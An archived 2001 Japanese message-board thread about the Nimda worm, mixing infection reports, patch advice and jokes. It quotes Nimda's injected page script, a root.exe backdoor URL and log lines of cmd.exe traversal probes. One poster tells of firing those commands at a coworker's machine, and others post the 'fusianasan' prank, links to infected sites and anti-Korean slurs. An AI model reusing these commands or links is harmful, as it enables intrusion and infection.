nimdaにやられちゃいました・・・

nimdaにやられちゃった人いる？

nimdaってなに？

admin（政府）

ﾆﾀﾞ

>>3
どっかにスレに朝鮮人（ニダ）犯行説となえてたｱﾌｫがいたな（ｗ

とりあえず、nimdaについて
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010919/1/

板違い。セキュリティ板に池。

ＭＳＮウイルスから完全にＣＰＵを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。

ダウンロードの方法は
１．書き込みの名前の欄に　http://fusianasan.2ch.net/　と入れる。(裏ドメイン名）
２．E-mail欄に、msn virus killerと入力する。（ログオン）
３．本文に「ウイルス　逝ってよし」を入れて（パスワード）、書込みボタンを押します。
４．タイトルが「ウイルスバスターダウンロード」に変わればＯＫ！
５．サーバーが重いと２chに戻ってくるけど、くじけずに何度も挑戦!
　　うまく行くと、目的のページにつながります。
６．家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
　　都合上つながる確立が高いです。

　（注意！）全て半角で入れること！！
　　　　　　　２３：００〜０３：００の間はつながり難いです！何度もトライ！
　　　　　　　http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
　　　　　　　「鯖が見つかりません」になります。入り口は「表２ch」のＣＧＩだけです。

ウイルス逝ってよし

ウイルス　逝ってよし

>>8
ヴァカ
ぷ

nimda nimda

すっかりやられた・・・

国際サイバーテロ説があるな。

なんでお前らSP2にしとかなかったの？
何ヶ月か前に出たのに

WindowsUpdate使っても5.5SP1のまんまなんだよね・・・

まあ、HD全部消すようなやつじゃなくて良かったね

　　　　　　　　　　　　　／￣￣￣￣￣
　　 　 　 　 　 　 　 　 |　神様教えてください。IE6.0入れようかまよっています。
　　 　　,＿＿　　　　　|　今はIE5.5SP1です。どうか道をおしめしください。
　 　 ／　　.／＼ 　　　＼＿＿＿＿＿
　 ／　　.／( ・ ).＼ 　　　　　　o〇　 　 　　 ヾ!;;;::iii|//"
／_____／ .（´ｰ｀）　,＼　　 ∧∧　　　　　　 　 |;;;;::iii|/ﾞ
￣|| || || ||. |っ¢..||￣　　（,,　　）　ﾅﾑﾅﾑ　　 |;;;;::iii|
　 || || || ||./,,,　|ゝ iii~ 　　⊂　 ヾｗｗｗｊｊｒｊｗw!;;;;::iii|ｊｗｊｊｒｊｗw〃
　 |￣￣￣|~~凸（￣）凸　.（　　,,）〜　ｗｊｗｊｊｒｊ从ｊｗｗｊｗｊｊｒｊ从ｊｒ

nIMDA は nVIDIA と関係ありますか？

>>19
大ありです

>>18
６は結構良いよ。エロ画像よく見るなら画像の縮小機能がいい感じ。

やられました。

あ、トリップ間違えた。こっちだ。

　　　　　　　　　　　　　／￣￣￣￣￣
　　 　 　 　 　 　 　 　 |　神様教えてください。IE6.0入れようかまよっています。
　　 　　,＿＿　　　　　|　漏れも5.5ｓｐ1で安定してました
　 　 ／　　.／＼ 　　　＼＿＿＿＿＿
　 ／　　.／( ・ ).＼ 　　　　　　o〇　 　 　　 ヾ!;;;::iii|//"
／_____／ .（´ｰ｀）　,＼　　 ∧∧　　　　　　 　 |;;;;::iii|/ﾞ
￣|| || || ||. |っ¢..||￣　　（,,　　）　ﾅﾑﾅﾑ　　 |;;;;::iii|
　 || || || ||./,,,　|ゝ iii~ 　　⊂　 ヾｗｗｗｊｊｒｊｗw!;;;;::iii|ｊｗｊｊｒｊｗw〃
　 |￣￣￣|~~凸（￣）凸　.（　　,,）〜　ｗｊｗｊｊｒｊ从ｊｗｗｊｗｊｊｒｊ从ｊｒ

>>24
IE5.5SP2

　　　　　　　　　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　 　　,＿＿　　　　　|　神様おぼしめしのとおりIE6入れました。とりあえず良かったみたいです。
　 　 ／　　.／＼ 　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　 ／　　.／( ・ ).＼ 　　　　　　　　　　o〇　　　　　　 ヾ!;;l;::lilii|//"
／_____／ .（´ｰ｀）　,＼　　　　　　　 ∧∧　　　　　　 　 |;;l;;::|liii|/ﾞ
￣|| || || ||. |っ¢..||￣　　　　　　　（,,　　）　ﾅﾓﾅﾓ 　　 |;;l;;::||iii|
　 || || || ||./,,,　|ゝ iii~ 　　／■＼ ⊂　 ヾ..　 　　 　 　 |;;|;l;::i|ii|
　 |￣￣￣|~~凸（￣）凸（　　　　.）.（ﾞ　 ,,,）〜　ｗｊｗｊｊｒｊ从ｊｗｗｊｗｊｊｒｊ从ｊｒ
ﾞﾞ""""ﾞﾞ"""""""""""""""""""""""""ﾞﾞ　　　ﾞﾞﾞ　　　ﾞﾞﾞﾞﾞﾞﾞ　　　　　ﾞﾞﾞ

IE4.0だし、、、。

どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない？

見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい。

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

ウイルス　逝ってよし

>>28
つまらん戯言ぬかしてるヒマあったら
自慢のヒビ入りキューブでも見てオナってなさい(ﾌﾟ

キューブやゲロ柄の愛マックラッシュは最低最悪だった。

はっはっはっ、ザマーネーナ(藁

>>30
>>31
でもnimdaにはやられないぞ！
>>28
激しく同意！！
「Windowsは欠陥品である」！！

ジョブスが自殺しそうで心配だ、、、。

>>30

残念でしTA!
俺はFreeBSDさ。

全く、馬鹿Winユーザーのせいでアタックが多いYO!

漏れのPC１００ギガ。にむだ60ギガ

元気ですか？

はじめまして、ひとみでーす。
突然ですが、最近、どーも「日照り」が続いてるのよね。
あーっ、どっかにいい男、いないかなーっ、なーんて
思ったりしちゃってる今日この頃。

ってゆーワケで、アナタにお手紙しちゃったって感じです。

ブシツケなメールかもしれないけど、許してね。
いらないならゴミ箱にポイして下さいね。

私がどんなヒトかとゆーと、看護婦をしてるんだけど、
諸般の事情（涙）でこんなサイトの
運営をお手伝いしてるヒトなんです。一度見に来て頂戴ね。
http://www.net-gang.com/girls/hfriend/

お時間がある方はぜひ一度ヨロシク。

p.s.私はどこにいるでしょう？　よーく探してね！！

間違って届いちゃった人は、下の所でメアド削除してね。
http://nomail.whiteshower.com/

ここにある濾過ソフト（無料）をつかえば、
完全に除去できるよ。ノートンだと完全には駆除できない。
http://www.shoei-roka.co.jp/productinfo/product-r.html

こんかいのウィルスの犯人については、このページの
情報（なんと予言！）がかなり当たってそうです。
http://www.hito-plaza.com/MM/news010914.htm

ウイルス　逝ってよし

平素より MSN をご利用いただき、まことにありがとうございます。

9 月 18 日夜 11 時より、MSN（http://www.msn.co.jp/）において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。

また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。

自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1

これ以外のブラウザを利用されている方は、MSN（http://www.msn.co.jp/）にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。

「Nimda」には以下の機能があります。
1. 電子メールによって「Nimda」を配付
2. ネットワーク不の他のコンピューターに「Nimda」をインストール
3. インターネット不のサーバーにアクセスして、可能であれば「Nimda」をインストール


尚、「Nimda」のアンインストールには以下のソフトウェアが必要です。
トレドマイクロ社（http://www.trendmicro.co.jp/）ウイルスバスター2002
シマンテック社（http://www.symantec.co.jp/）ノートン・アンチウィルス 2002

「Nimda」は Windows 95/ 98 / Me / NT / 2000 でご利用いただけます。

MSN（http://www.msn.co.jp/）は､月間ユニークユーザー数1600万人（2001年7月）を誇る
日本で有数のウイルスポータルサイトです｡今後ともよろしくお願いします。

>>40 ワラタ

>>40
あは
はぁ〜

今日、なんかネット全体が重くない？
プロバイダのODNが悪いのかな。

＞MS、セキュリティ機能をアップしたWindows XPを前倒し出荷！
ここんとこのワームって
何だかMSとシマンテックの自作自演っぽいよねえ？
タイミングが合い過ぎ…^^

>>43
ウィルスのせいだよ＜トラフィック増大

lynx -source http://210.135.201.16/ | grep readme

<html>
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
</html>

　　　　　　　　　　　　 ∩
　　 　 　 　 　 　 　 　 | |
　　 　 　 　 　 　 　 　 | |
　　 　 　 　 　 　 　 　 | |
　　 　 　 　 　 　 　 　 | |
　　　 　 　 ∧＿∧ 　 | |　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　 　 （　´Д｀）／ /　　＜ ﾉｰﾄﾝ先生!JS.Exception.Exploitです
　　　　　 ／ 　　 　 ／　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　 / /|　　　　/
　 ＿＿| | .|　　　　|
　 ＼　 ￣￣￣￣￣￣￣＼
　　||＼　　　　　　　　　　 　 ＼
　　||＼||￣￣￣￣￣￣￣||￣
　　||　 ||￣￣￣￣￣￣￣||
　　 　 .||　 　 　 　 　 　 　 ||

>>46
JavaScriptを切っておけばおっけいってことなんだ？

なんだか良くわからねーや、まぁヨシとするか？

　　　　　∧∧
　　　　<｀∀´>
　　　　　≡
　　／＼≡／＼
　　　　　│

今やっとSP2ダウンロード出来た｡
一日目、NimadaパニックでWindows　UP　DATEが混み合っていて、
ほんの僅かしかダウウンロード出来ず中断｡
二日目、半分以上ダウンロードできたがそこで中断｡
深夜である現在まで起きてようやく完了｡

Nimadaもラディンの仕業か？
だったら、許せんから俺は兵役に志願してやるぞ｡

http://windowsupdate.microsoft.com/

私のブラウザはjava関係の調子が悪くてIEのダウンロードのリンクまで辿り着けません・・・

しかしWindowsXPでこうゆうことになったらどうなんだろ。
今回みたいな再インストールしなければならんのワームが猛威をふるったら、
アクティベーションの電話パンクしてパニックかも。

おれも>>43と同様に
妙に重いんだが…

ZoneAlarmには何もかかってないから
ウイルスが何かしてるとは思えない？

ちなみに駆除ソフトが古く、
かつプリインストールなのでアップデートできず、
namdaに対応していないのでわからん。

>>53
今夜は確かに重かった。重くなったり軽くなったり。

お。>>54
レスありがと。
IEだけじゃなく
かちゅ〜しゃで２ちゃんのログ読み込みも重かったよね？

とりあえずreadme.*で検索してそれらしいファイルはまったくなかったので
感染はしてないと思う。

ところでZoneAlarmって常駐させてなくても
登録していないソフトはネットにアクセスできなくなるのだが。

例えば新しくタブブラウザ入れて
そのままだとネットに繋がらない。（ZoneAlarm起動していないのに）
わざわざZoneAlarmを起動してそのソフトを許可しないと繋がらない。
これってどういう仕組みなんだろう？
わかるヒトいたらレスください。

スタートアップに登録しているというオチはありません。

>>53
無料のAntidote使おうよ

2chのお陰でIE5.01SP2を数ヶ月前に導入済み。
私にとっては、今回は対岸の火事。

「nimda」って、
「admin」の逆さま。

いつになったら気付くんだyo!

http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp?MAINMODE=&MODE=VIEW&ID=13&MOVEPOS=&MOVETYPE=

http://www.nimda.net

ﾔﾗﾚﾀｰﾖ(´Д`)

http://www5d.biglobe.ne.jp/~musume/
↑加護のバナーをクリックしたら･･･（謎）

>>60　ﾔﾗﾚﾀｰﾖ(´Д`)

>>55
スレ違いだが、ZoneAlarmはある意味危険。
終了すればインターネットに繋がらなくなるし、アンインストールしてもインターネットに繋がらない。
そういうわけで漏れはアタックを承知の上で使うのをやめた。

http://www.jp-express.com/jp-express/visitors/img-box/img20010919074204.jpg
怖いよ−・・・・
これは何の生き物ですか・・・
何かさけんでる・・・

>63
そんなことはないと思うけど。
少なくとも自分の環境(Win98SE)では終了してもネットにつなげるし、ｱﾝｲﾝｽﾄしても問題は起こらない。
>>55みたいな現象は初めて聞いたよ。

>64はグロ画像

>>65
うちはWin2kだけど、Win2kだとサービス起動だから、
ZoneAlarm終了させるとインターネットにアクセスできなくなる。
アンインストールの場合はそのサービスもアンインストールされるから大丈夫だけど。

>>66

ヒドイ！そんなふうに言わなくたって！（ﾉ_；）

>>56
ありがと。DLしてみたよ
ちなみにベクターにあるのは日付が古かったので
これから使いたいヒトは作者（会社）のページから落とした方がいいです。
ちなみに企業のHPでディレクトリ見えてるのって初めてだった。ちょいまぬけ。


>>63と>>67は同じヒトかな？
Windows2000だとZoneAlarmはNGのようですね。

Windows98SEでは起動して許可したソフトは問題なく接続できるので
あたらしいソフトを入れた際に忘れていると困る程度です。

>>65
終了してても許可済みのは大丈夫です
ただ、新しく入れたソフトやディレクトリを移動させたりしたソフトで
未許可だと、何故かZoneAlarmが動いてないのに繋がらないというだけです。
（そこが不思議なんですが）


ZoneAlarm入れてると
メディアプレーヤーとかが勝手に情報送ってるっぽいのがわかったり
韓国とかイスラエルからのお客さんが来たのがわかったりして
面白かったのでそのままつかってます。

ルーター使い始めたので、もう入れてても意味は無かったりするんですが

アンチウィルスベンダ各社は、」 Nimda 被害の拡大を食い止めるための感
染の検出と駆除サービスを開始した。
　サービスを行っているサイトのURLは下記であるが、必ずしも全ての感染状
態を元に戻るわけではことないので、削除後も注意が必要である。
　Nimda は、レジストリを書き換えたり、LAN上の他のコンピュータ上の共有
ファイルへの感染など複合的な影響を与える。
　そのため駆除サービスを受けても必ずしも完全に元の状態に戻るわけではな
いことに十分注意が必要である。
　また、駆除後は、マイクロソフト社の最新パッチをあてる必要がある。

トレンドマイクロ　感染検出、駆除、手動駆除など
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ　感染検出、駆除方法、駆除ツールなど
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.nai.com/japan/nimdatool.asp

シマンテック　最新情報とアンチウィルス定義ファイルの提供
検出、駆除サービスは行っていない
http://www.symantec.co.jp/region/jp/sarcj/nimda.html

Scan Security Wire Nimdaなどほとんどの攻撃からIISを自動防御するツール
http://www.vagabond.co.jp/c2/scan/secureiisweb.html

また、IPAの情報も更新されている
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

WORDの初期起動が遅くなった人いない？
Win起動後、初めてWORDファイルを開くと。
１００ｋｂも行かないファイルが、読込に30秒ぐらいかかるんだけど。
2回目以降は変わんないんだよね。
Nimdaに感染したＰＣで多発してるんだけどさ。

ニムダは韓国の文化二ダ！
日本は反省しる！

変わんない→即開くことが出来る　　　です・・・。

ふしぎと会社ではぜんぜん被害なかった。
サーカムも問題ないし。

社内のPCをすべてIE6にするのはつらかった・・

>>72
nimdaを逆から読んでみな、厨房クン（ｗ

>>28
そもそもパソコン自体が欠陥品でしょう。

>>75
バカ発見！

IE4.01SP1なんだけどやばいかな？
Windows98なので、IE4がいちばんサクサク動くんだよね。
だからIE5はいれたくないんだけど、
IE4.01のSP2ってもうDLできないんだよねぇ。
困ったなぁ、ネスケにするかなぁ〜

>>75
バカ発見！

>>74

へ？　IE6は感染するってＭＳが言ってるよ

---

当のＭＳがインストールの仕方如何で「Nimda ワーム の影響を受ける恐れのある製品 」と公認しているIE6を勧める気にはなれない。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
：
： 　　　　　　　　　　　　　　　　　　　ρ(^-^)インストールのやり方次第ということ
MicrosoftR Internet Explorer 6 (最小構成時のみ)

---
MicrosoftR Internet Explorer 6 は、ＭＳ公認の　Nimda ワーム の影響を受ける恐れのある製品 であります。

ＩＥ5.5　SP2のセットアップファイルって、全てをダウンロードできないの？
分かりやすくいえば、雑誌の付録についている形式で。
セットアップの部分だけダウンロードして実行し、必要なファイルだけ
その時にダウンロードする形式みたいなんだけど・・・。

一瞬、「nimdaにふられちゃいました・・・」
かとｵﾓﾃしまった。

Linuxer だけど何か？

>>83
別に？

で、これは感染すると自分のコピーをばらまく以外に何をするの？

>>85
コピーをばらまくので、不要なパケットが飛び交う。
ポート80のアクセスがウザイ。

×　ポート80のアクセス
○　ポート80へのアタック

こんなの埋め込んだら気づくかな・・・。
もっと細かいバーヂョンチェックできない?

<script language="JavaScript">
<!--
ver = navigator.appVersion;
if (navigator.appName == "Microsoft Internet Explorer" && navigator.platform == "Win32") {

if (ver.indexOf("MSIE 4") > 0 || ver.indexOf("MSIE 5.0;") > 0) {
window.open("http://www.microsoft.com/japan/technet/security/nimdaalrt.asp");
window.open("http://windowsupdate.microsoft.com/");
}
};
// -->
</script>

>>84
http://a115.ms.a.microsoft.com/f/115/1611/2h/download.microsoft.com/download/ie501sp2/Install/5.01_SP2/WIN98/JA/ie5setup.exe
上記ファイルをc:\aaaaaフォルダにダウンロード

スタート→ファイル名を指定して実行で
C:\aaaaa\ie5setup.exe" /c:"ie5wzd.exe /d:1 /s:""#E"
でOK。

Windows95＆98用・WindowsNT用・Windows2000用がダウンロード可能。
*Windows2000用はWindows2000の環境じゃないとダウンロードできない。。

うおっ、
８１へ書いたつもりが、８４にしてしまった・・・

しかも、８１も「IE5.5sp2」って書いてる。。。

ミスった。。。。

459 名前：名無しさん＠お腹いっぱい。 本日の投稿：01/09/25 06:17
>>444
>ウチの会社、偉い人が
> 「ＨＰを見るだけで感染することなど有り得ない」
> と断言しちゃったんで、事実上対策禁止状態・・・。


会社サイトで堂々とニムダ垂れ流してるのはこういうところか・・。

たしかにニムダ、しなやかにニムダ、先進のネットワーク企業
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275&ls=100

>>88

自爆式ニムダか・・(^^;

なんか2ｃｈウイルスとかいうのが
出回ってるらしいよ。
インターネットエクスプローラで
sage.exeとかいうのを検索してそれがあるなら
感染してるらしいです。

>>93
手垢まみれのネタです。

sage.exeのプロパティ
Task Scheduler Sage Compatibility
会社名　　　　　　Microsoft Corporation
言語　　　　　　　 日本語
正式ファイル名　 sage.exe
製品バージョン　 4.71.1972.1
製品名　　　　　　Microsoft(R) Windows(R) Task Scheduler
内部名　　　　　　TaskScheduler

>>93
げげっ　検索したら見つかっちゃった。
どーしよう。どーしよう。どーしよう。どーしよう。どーしよう。どーしよう。

すぐに削除しなさい。
削除できなかったらすでに感染してるということだから、
MS-DOSで消すこと。

sage.exe削除したぞ。もう大丈夫だ(´Д`)

telnet://210.151.237.34

ぷっ。ひでー

悩屯先生、またあたらしいパターンファイル出てるぞー。

ニムダにやられちゃいました・・・（ｗ

http://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all

＜ソニー銀行＞システムに障害　口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。

nimdaの対応に追われて今週の平均睡眠時間は2h弱。
�@MS01-044適用しました。
�ASRP適用しました。
�BIE5.5SP2適用しました。→結局ダウンロードを選択したら感染するんでしょ？
�C共有ディレクトリのアクセス権設定し直しました。
�Dウィルスの最新パターンファイルダウンロードしました。

�@については7月中に適用しました。
でも�Cと�Dが遅かったため
バカなやつが感染してすべてが水の泡でした。

結論：WINはターゲットになりやすい(ウィルス作成者をその気にさせる)。
　　：バカがいると結局だめ。
　　：今回はあまりにも対応が遅いシマンテックの自作自演ではなさそう。
　　：JPCERTはCERTの翻訳版を早く公開しろ。

日本で対策が遅れているのは、21日にIPAが収束宣言を出したため。

取り下げろ＞バカ

http://www.mainichi.co.jp/digital/netfile/archive/200109/21-1.html
IPAは「届け件数の伸びから考えると被害は収束する方向にある」と分析している。
IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件
（午後4時30分時点）、翌20日は65件（同）だった。今年7月に全国的に被害の遭った「サーカム」
は11日間で700件を超えたケースと比較すると被害は少ないと見ている。

サイト感染は恥だから申告するわけなかろう。つーか、普通そんなことしてる場合じゃないし。

VOTEこねーなー。だれか送ってくれねーかなー。

　　　　　うわ〜ん、感染から１０日たったよ〜
￣￣￣￣￣￣￣￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　 　 Λ＿Λ
　　　　　　　　　　（ ゜∀⊂ヽ ﾆﾔﾘ
　　　　　　　　　 ⊂　　　　ノ
　　　　　　　　　　 人　 Ｙ
　　　　　　　　　　し （＿）
http://www.zdnet.co.jp/news/0109/28/e_nimda.html

ゆうべ　ノートンも　バスターも　パターンファイル更新されたよ。

ノートン　昼にまた　パターンファイル更新されたよ。

Nimda情報
http://www.clubtgp.com/freehosting/teeny/kat/index.htm

>>107

あーあーあー、最低だな、コレ(^^;

>>107
ご馳走様。

ﾊｧﾊｧ ﾓｯﾄ

>>104
再感染警戒age

test　　　　

今日もIEの旧バージョンを使いたいというヴァカがいて
めーーーちゃくちゃ頭にきた。
さっさと氏ねヴァーーーカ！！

>>113
ネスケだけで開発していて感染気付かないヴァカ管理者も氏ね！

>>113
http://www.mcafee.com/myapps/utilities/ov_neoplanet.asp

これ薦めとけ（ｗ

>>114
ネスケはとっくに全面禁止にしてます。
115>>
うん。すすめる。

ふと思ったけど、ニムダがMSNに感染していたちょうどその時に
初めてパソコン買ったユーザーはどうなったんだろ？

喜び勇んでインターネットしようとしたら、
当然IEのスタートページがMSNだからうむを言わせず感染？！

そーかもね。

>>117

近い例知ってる。
買って（少し使ってから）半年使ってなくて、
久々に使ってURL窓に入れたURLが文字列まちがってて、
検索結果（ＭＳＮ）が出てきて感染（らしい）

デフォルトはバイオだったのでMSNじゃなかったそうな。

>>1
確か、2chに、ビル・ゲイソさんがいたと思いますが、
貴方はゲイソさんですか?

僕は、ゲイソさんからウイルスを受け取りました。
Hotmail&パッチを組んでいたので良かったー！

あは

やられちゃいました

http://www.zumensoft.co.jp/menu.html

ここたぶん永久感染・放置

http://www.bee.woodland.co.jp/test/column/kb-index.asp

http://3533637102/

http://3403692948/

http://www.bee.woodland.co.jp/test/column/kb-index.asp

ほんとだ、ウイルスがいる！

ました。

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

http://3403687705/

http://www.bee.woodland.co.jp/readme.eml

だめぢゃん��(￣△￣；

ホネの髄まで感染しちゃいました

http://211.135.69.237/hoge

http://z.nttec.edu.cn

http://www.bestcert.com.tw/
http://www.gunsul.busan.kr/

http://210.190.60.211

IE4.01の人も含めて、この対策もしておいた方が吉。
落とすのは、修正プログラム。

「Microsoft VM による ActiveX コンポーネントの制御」 の脆弱性に対する対策
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075

http://210.102.151.10

http://210.103.173.1/

http://www.with9.com/

重要なお知らせ
9/18当サーバーは『Nimdaウイルス』感染し、皆様には大変な迷惑と、ご不便をおかけすることなり大変申し訳ございませんでした。

同ウイルスにより、当サーバーは深刻な被害をうけ、現在のサーバーは仮運用となっているため、動作スピードが十分でなない可能性がございます。 早急に完全な状態に復旧する所存ですのでご理解いただけますようお願いいたします。

http://www.miruku.co.jp/usr/find/higa.htm

ニムダ感染で行方不明になりました。
探してください。

ニムダにやられちゃいました。

http://www.miruku.co.jp/

age

nimdaとは直接関係ないが

IE(5以降)を起動
↓
「ファイル」-「開く」
↓
http://61.136.189.106 と入力
↓
「Webフォルダとして開く」にチェック
↓
OKをクリック
↓
(ﾟ∀ﾟ)ｱﾋｬﾋｬ

http://3535682771/scripts/root.exe?/c%20dir%20%63%3A%5C

むーん。
http://www.miruku.co.jp/usr/find/higa.htm

たのむからこの期に及んで感染しないでくれ・・。

感染　コマツ電子金属　アニュアルレポート
http://www.komsil.co.jp/
http://www.komsil.co.jp/office/annual-t.htm

「レイキ」宇宙エネルギーによるハンドヒーリング
http://www.mnet.ne.jp/~satoken/index.htm

結局ここの人間はなおしてないのか・・。

http://www.miruku.co.jp/usr/find/higa.htm

ちゃいました・・・

http://61.187.88.11

なんだこりゃあ・・。

IEのようなブラウザでみてくれ。
ftp://shop.tv-tokyo.co.jp/10k.html

はきーんぐはきーんぐ

http://people.site.ne.jp/mirror2/2001.10.07/matrix.baltimore.co.jp/index.html

Mimuraに穴という穴を突かれてしまいました…

これほしい・・。

https://www.netsecurity.ne.jp/article/8/2930.html

Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339

http://www.86star.co.jp/
↓
ftp://www.86star.co.jp/
↓
http://people.site.ne.jp/mirror2/2001.10.07/www.86star.co.jp/index.html
↓
・・・・。

やられちゃいました。

■流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn
マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。

エルナードの財宝ゲット！
http://www.kagaku.co.jp

http://www.panasonic.tcp.ne.jp/

これ一体何よ？（＞＜）

>>155
試しに、ページを保存してみた。
↓ソース
<HTML><BODY><META HTTP-EQUIV="Refresh" CONTENT="0;http://www.yahoo.co.jp/"></BODY></HTML>

なぜヤフー？
詳しいことわからんけど、
HP制作に詳しい人、説明求む・・・。

>>156

この会社、なんでこんなへんなクラックされてるんだろ？

ここ、元感染ページなんだけど・・。

http://sapporo.cool.ne.jp/asd0918/

結局何もなかったから感染しなかったのかな？

>>158

すごいね、ここ・・。

ここ、なんか飼ってるね・・。

http://www.cosmo-system.co.jp/E101E100%90%5c%8d%9e%93o%98%5e%93%fc%97%cd.asp

LANの中の１台だけ（独立して使うことが多いノートマシン）
感染してました。他のマシンも再インストールするべき？

駆除したはずのニムダが今日急に復活しました。
セーフモードでも立ち上がりません。
すぐにバックアップを取るように、
という警告が出ているのですが、それもできません。
これって、もうダメなんでしょうか？

>>163
駆除後はＭ＄社の最新パッチをあてる必要があります。
やりましたか？

>>164
ＳＰ２とＩＥ６を入れてから、駆除したような気がします。
駆除している時も、訳のわからんフォルダからウイルスが発生するので、
そのフォルダごと削除してその場は一件落着。
それから３週間後の出来事でした。もちろん定期的にスキャンかけてました。
その間ネットにはつないでいません。

Ｃドライブ：プログラムファイル、Ｄドライブ：データ　としているので、
明日にでもＣドライブをカスタム再セットアップする予定です。
正解でしょうか？

昨日昼過ぎ、HTTPDを立ち上げたところ
・・・あれ？誰かアクセスして来た。
ごそごそ（ログを漁る）・・・

xx.xxx.xx.xxx - - [16/Oct/2001:14:54:00 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 252
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:05 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:05 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:09 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
・・・・・・・・・・

・・・誰だ、俺のＰＣを攻撃してる奴ァ！！！
ってNimdaかい、このパターンは。
xx.xxx.xx.xxx をトレースすると社内。
あ・れ・ほ・ど小うるさくセキュリティ強化されて
こっちはとばっちり食らってるっーのに、まぁだ
感染する奴がいるのか。
あんまり腹が立ったので、こっそりと別の共用サーバ
とかはしごして足跡ごまかし(姑息)てから TELNETで
"GET /scripts/root.exe?/c+dir HTTP/1.0"
とか一通りぶち込んで差し上げました。

さて、そんなことすっきりと忘れた今日、一通のメール。
「×××××（共用サーバ）がウィルスに感染しました。」
あわわわわ、共用サーバってWindowsでもUNIXでもない上に
LANの中だけのマシンだから「ウィルスに感染」するわきゃ
無いんですね、これが。

そんなわけで、ウィルスになったワタシ。
「感染源」は特定されなかったようです（笑

IEのステータスバーが水色になったんだけどこれってNimdaなの？
既出そうでｽﾏﾝがNimda感染の症状教えてくり。

>>167

おおざっぱにいうと、自覚症状はない。
他覚症状はあるようだが。

浮気相手にニムダうつします

http://www.interq.or.jp/yellow/merits/main.htm

ドットを含まないIPアドレスを含むURLの処理など、IEに影響を及ぼす3つの脆弱性を排除する英語版プログラムをリリース（マイクロソフト）(2001.10.18)

　マイクロソフト株式会社は、ドットを含まないIPアドレスを含むURLの処理など、IEに影響を及ぼす3つの脆弱性を排除するプログラムをリリースした。対象となるのは、IE 5.01SP2、IE 5.5SP2およびIE 6で、日本語版プログラムもダウンロード可能。

http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-051

Ｎ　Ｉ　Ｍ　Ｄ　Ａ

Ｍをとると

Ｎ　Ｉ　Ｄ　Ａ

ニダ

はてさてＭはなにを意味しておるのか
はてさてふむ〜〜

>>171
キムのム

Ｌ　Ｕ　Ｎ　Ｃ　Ｈ
Ｌを取ると

Ｕ　Ｎ　Ｃ　Ｈ

はてさてＵＮＣＨはなにを意味しておるのか
はてさてふむ〜〜

改竄されても、ニムダに罹っても、それを教えてもらっても、見てない管理者


http://www.apec.co.jp/guest/guestbook.asp?page=1
http://www.apec.co.jp/guest/guestbook.asp?page=2
http://www.apec.co.jp/guest/guestbook.asp?page=3
http://www.apec.co.jp/guest/guestbook.asp?page=4

https://www.netsecurity.ne.jp/article/9/3017.html

http://headlines.yahoo.co.jp/hl?a=20011022-00000002-vgb-sci

>>173
L だけ体内で消化される、という認識でよろしいか？

>>175がいまいいこといった！

http://mx31.tiki.ne.jp/~isao-o/profile.html

ました。

やられちゃいました。

http://www.bnetx.com/okazawa/

おいおい、また閉鎖かよ？

